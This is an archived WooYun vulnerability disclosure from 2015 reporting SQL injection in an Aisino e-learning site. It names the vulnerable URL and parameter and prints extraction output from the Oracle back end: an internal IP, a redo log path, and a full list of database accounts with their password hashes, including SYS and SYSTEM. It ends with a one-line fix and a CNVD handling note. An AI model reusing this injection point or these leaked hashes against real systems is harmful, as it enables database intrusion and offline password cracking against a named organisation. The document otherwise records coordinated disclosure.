乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-21: 细节已通知厂商并且等待厂商处理中 2015-05-25: 厂商已经确认,细节仅向厂商公开 2015-06-04: 细节向核心白帽子及相关领域专家公开 2015-06-14: 细节向普通白帽子公开 2015-06-24: 细节向实习白帽子公开 2015-07-09: 细节向公众公开
Aisino航天信息某站点SQL注射。
注入点:http://edu.aisino.com/ilearn/en/learner/jsp/dxc/gonggao/viewgg.jsp?id=48查询当前库:
所有库:
是否为DBA:
获取IP及日志路径:
web application technology: JSPback-end DBMS: Oracleselect sys_context('userenv','ip_address') from dual: '172.26.1.28'web application technology: JSPback-end DBMS: Oracleselect member from v$logfile where rownum=1: '/oracle/oradata/ora9/redo01.log'
枚举数据库账号信息:
database management system users password[*] _NEXT_USER [1]: password hash: NULL[*] ANONYMOUS [1]: password hash: anonymous[*] AQ_ADMINISTRATOR_ROLE [1]: password hash: NULL[*] AQ_USER_ROLE [1]: password hash: NULL[*] AUTHENTICATEDUSER [1]: password hash: NULL[*] BLEWIS [1]: password hash: C9B597D7361EE067[*] CDOUGLAS [1]: password hash: C35109FE764ED61E[*] cluster [1]: password hash: 04D4578ABDCFF4F1[*] CONNECT [1]: password hash: NULL[*] CTXAPP [1]: password hash: NULL[*] CTXSYS [1]: password hash: 71E687F036AD56E5[*] DBA [1]: password hash: NULL[*] DBSNMP [1]: password hash: E066D214D5421CCC[*] DELETE_CATALOG_ROLE [1]: password hash: NULL[*] EJBCLIENT [1]: password hash: NULL[*] EXECUTE_CATALOG_ROLE [1]: password hash: NULL[*] EXP_FULL_DATABASE [1]: password hash: NULL[*] GATHER_SYSTEM_STATISTICS [1]: password hash: NULL[*] GLOBAL_AQ_USER_ROLE [1]: password hash: GLOBAL[*] HS_ADMIN_ROLE [1]: password hash: NULL[*] ILEARN [1]: password hash: 1BEC67835FC41A5F[*] ILEARN5 [1]: password hash: 33F978B1E060D8A6[*] ILEARN5_RPT [1]: password hash: E4981A53DE2F3ACD[*] ILEARN_DEV [1]: password hash: 264424C8DEDD00CB[*] ILEARN_RPT [1]: password hash: E1105C70B276E898[*] IMP_FULL_DATABASE [1]: password hash: NULL[*] JAVA_ADMIN [1]: password hash: NULL[*] JAVA_DEPLOY [1]: password hash: NULL[*] JAVADEBUGPRIV [1]: password hash: NULL[*] JAVAIDPRIV [1]: password hash: NULL[*] JAVASYSPRIV [1]: password hash: NULL[*] JAVAUSERPRIV [1]: password hash: NULL[*] KWALKER [1]: password hash: AD0D93891AEB26D2[*] LAPUTA [1]: password hash: 780588F642C11C2A[*] LOGSTDBY_ADMINISTRATOR [1]: password hash: NULL[*] MDSYS [1]: password hash: 72979A94BAD2AF80[*] OEM_MONITOR [1]: password hash: NULL[*] ORDPLUGINS [1]: password hash: 88A2B2C183431F00[*] ORDSYS [1]: password hash: 7EFA02EC7EA6B86F[*] OUTLN [1]: password hash: 4A3BA55E08595C81[*] OWF_MGR [1]: password hash: 60AF578E4F1422EB[*] PLUSTRACE [1]: password hash: NULL[*] PUBLIC [1]: password hash: NULL[*] RECOVERY_CATALOG_OWNER [1]: password hash: NULL[*] RESOURCE [1]: password hash: NULL[*] SCOTT [1]: password hash: F894844C34402B67[*] SELECT_CATALOG_ROLE [1]: password hash: NULL[*] SPIERSON [1]: password hash: 4A0A55000357BB3E[*] SYS [1]: password hash: 4DE42795E66117AE[*] SYSADMIN [1]: password hash: DC86E8DEAA619C1A[*] SYSTEM [1]: password hash: 970BAA5B81930A40[*] WFADMIN [1]: password hash: C909E4F104002876[*] WM_ADMIN_ROLE [1]: password hash: NULL[*] WMSYS [1]: password hash: 7C9BA362F8314299[*] XDB [1]: password hash: 88D8364765FCE6AF[*] XDBADMIN [1]: password hash: NULL[*] YANGLIN [1]: password hash: 7A368A29714E91C2[*] ZWELL [1]: password hash: 6C602F189626BD8C
过滤参数。
危害等级:中
漏洞Rank:9
确认时间:2015-05-25 13:36
CNVD确认所述情况,已经转由CNCERT向北京市政府信息化主管部门通报,由其后续协调网站管理单位处置.
暂无